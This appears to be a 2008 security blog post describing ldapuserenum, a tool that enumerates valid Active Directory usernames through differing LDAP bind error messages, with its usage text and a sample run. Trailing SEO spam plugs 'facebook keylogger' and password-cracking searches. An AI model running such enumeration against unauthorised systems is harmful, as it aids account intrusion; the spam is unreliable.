Information disclosure vulnerability could be exist in the microsoft ldap server responds when it’s binding to the ldap server. When an invalid password is provided, the server will respond with result code 49 (invalidCredentials) and an error message. A different error message is returned if an invalid username is provided. Here’s the usage of the ldapuserenum : (taken from http://labs.portcullis.co.uk/application/ldapuserenum/)
Usage
$ python ldapuserenum-0.1.py -h
Usage: ldapuserenum-0.1.py [-i] -tOptions:
–version show program’s version number and exit
-h, –help show this help message and exit
-d show description and exit
-t TARGET target IP or hostname
-i, –info show LDAP information gathering resultsExample
$ python ldapuserenum-0.1.py -t 192.168.123.32
Going to enumerate users taking ‘./users.txt’ file as input
[*] Enumerated users:
[*] User: testuser
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: administrator
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: guest
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
[*] User: aspnet
[*] LDAP error code: 52e
[*] LDAP message: invalid credentials
Related articles :
- LDAP browsing with Luma
- Devil-Linux distro bundles router/firewall and server in one live CD
- Get thin client benefits for free with openThinClient
- Bad idea of the day: upgrading to Lenny with aptitude
Please explore this blog to obtain more informations about sql inject tutorial , cara ngehack fs , webgoat tutorials , friendster password cracker , and so on
Recenly searchIncoming search terms for the article:
backtrack ldap, ldapuserenum, backtrack and ldap, information gathering active directory, ldap backtrack, ldap exploit back track, ldap username backtrack, ldapuserenum backtrack, server information in active directory,Popular Today naruto shippuden 170 videolog, cat physics walkthrough, naruto shippuden 168 videolog, facebook spy, backtrack 3, shy engine, vtunnel, BackTrack tutorial, backtrack 3 tutorial, facebook photo viewer, See The Shocking Hidden Message In The Google Logo that GOOGLE Does NOT Want You To Know About!, how to view private myspace pictures, my empire hack, view private myspace pictures, SHOCKING: RUDE HIDDEN MESSAGE in Toy Story 3!, facebook keylogger, HIDDEN MESSAGE IN GOOGLE LOGO, Terri Moulton Horman, rapidleech, brute force facebook, Computer Security Stuff on eBay!
Electronics stuffs on ebay
ldapuserenum – Active Directory LDAP Server Information Disclosure Vulnerability is posted on November 14th, 2008 by admin. This post is filed under: Sectools, Security, Active Directory, backtrack and ldap, backtrack ldap, Client, Elastra, friendster password, information gathering active directory, LDAP, ldap backtrack, ldap exploit back track, ldap username backtrack, ldapuserenum, ldapuserenum backtrack, Lightweight Directory Access Protocol, PHP, Protocols, User .

Leave a Reply